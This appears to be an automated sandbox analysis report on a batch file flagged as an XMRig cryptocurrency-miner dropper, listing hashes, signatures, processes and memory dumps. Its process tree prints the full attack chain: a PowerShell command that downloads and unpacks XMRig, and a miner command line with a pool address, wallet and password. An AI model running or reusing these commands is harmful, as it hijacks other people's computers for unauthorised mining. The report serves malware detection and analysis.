Overview

overview

10

Static

static

1

tesy - Copy (10).bat

windows7-x64

10

tesy - Copy (10).bat

windows10-2004-x64

10

tesy - Copy (11).bat

windows7-x64

10

tesy - Copy (11).bat

windows10-2004-x64

10

tesy - Copy (12).bat

windows7-x64

10

tesy - Copy (12).bat

windows10-2004-x64

10

tesy - Copy (13).bat

windows7-x64

10

tesy - Copy (13).bat

windows10-2004-x64

10

tesy - Copy (14).bat

windows7-x64

10

tesy - Copy (14).bat

windows10-2004-x64

10

tesy - Copy (2).bat

windows7-x64

10

tesy - Copy (2).bat

windows10-2004-x64

10

tesy - Copy (3).bat

windows7-x64

10

tesy - Copy (3).bat

windows10-2004-x64

10

tesy - Copy (4).bat

windows7-x64

10

tesy - Copy (4).bat

windows10-2004-x64

10

tesy - Copy (5).bat

windows7-x64

10

tesy - Copy (5).bat

windows10-2004-x64

10

tesy - Copy (6).bat

windows7-x64

10

tesy - Copy (6).bat

windows10-2004-x64

10

tesy - Copy (7).bat

windows7-x64

10

tesy - Copy (7).bat

windows10-2004-x64

10

tesy - Copy (8).bat

windows7-x64

10

tesy - Copy (8).bat

windows10-2004-x64

10

tesy - Copy (9).bat

windows7-x64

10

tesy - Copy (9).bat

windows10-2004-x64

10

tesy - Copy.bat

windows7-x64

10

tesy - Copy.bat

windows10-2004-x64

10

tesy.bat

windows7-x64

10

tesy.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    0s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2023, 10:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tesy - Copy (4).bat

  • Size

    608B

  • MD5

    727c8da0478af118c957ae60f7161cab

  • SHA1

    cf18105b8659e93bbd2824fa35ef1bae7b395301

  • SHA256

    97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

  • SHA512

    d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score
10/10
xmrigminer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

  • XMRig Miner payload 6 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (4).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
      2⤵
        PID:2316
      • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
        xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        2⤵
          PID:1808

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        a5c074e56305e761d7cbc42993300e1c

        SHA1

        39b2e23ba5c56b4f332b3607df056d8df23555bf

        SHA256

        e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

        SHA512

        c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1o2zcnct.n4l.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0-gcc-win64.zip
        Filesize

        508KB

        MD5

        f2ed335bb2c6212901e4a322655ab953

        SHA1

        7e1fb3a27cad5ce2938f4692a2d75fc0b4a149a3

        SHA256

        0364eb2830294a21fe7c02f7cb1d4ec6dfa4ebdedfce90962fa5efaaacf562b8

        SHA512

        b19a13caf6ca285313ee0517caca6876d1abc172942e25a5b267aa40e65b1ba07b074bb97d964655944f15c1316c3e41774089a1d2d9f16123023743f104db6e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
        Filesize

        206KB

        MD5

        5fc3547f4e05dc2205b78c9f56391ac9

        SHA1

        e0b840d09be154616ef087295e59984802b1c361

        SHA256

        51761a0db91dfa73b199c4f0ebac7e0cfb329c29e83551d034c0d705d92d6fb9

        SHA512

        1b5527c0d8fad387c68c9c4cafd4c1e182911fc2b2b3cb05e815baf08bb23846b43da5938222b405c2acee37a9363bdb1cac886b8eaf0e830b1c8caa6c535358

        Download Submit

      • memory/696-12-0x000002DB456A0000-0x000002DB456B0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/696-11-0x000002DB456A0000-0x000002DB456B0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/696-10-0x00007FF95CDC0000-0x00007FF95D881000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/696-16-0x00007FF95CDC0000-0x00007FF95D881000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/696-9-0x000002DB2D520000-0x000002DB2D542000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1808-69-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-65-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-77-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-76-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-75-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-58-0x0000025D26570000-0x0000025D26590000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1808-74-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-59-0x0000025D28000000-0x0000025D28020000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1808-60-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-62-0x0000025D28040000-0x0000025D28060000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1808-61-0x0000025D28020000-0x0000025D28040000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1808-63-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-64-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-73-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-67-0x0000025D28040000-0x0000025D28060000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1808-66-0x0000025D28020000-0x0000025D28040000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1808-68-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-72-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-70-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/1808-71-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/2316-30-0x000001E9AC7D0000-0x000001E9AC7E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2316-28-0x00007FF95CDC0000-0x00007FF95D881000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2316-29-0x000001E9AC7D0000-0x000001E9AC7E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2316-55-0x00007FF95CDC0000-0x00007FF95D881000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2316-31-0x000001E9C8AB0000-0x000001E9C8AC2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2316-32-0x000001E9C8A90000-0x000001E9C8A9A000-memory.dmp

        Filesize

        40KB

        Download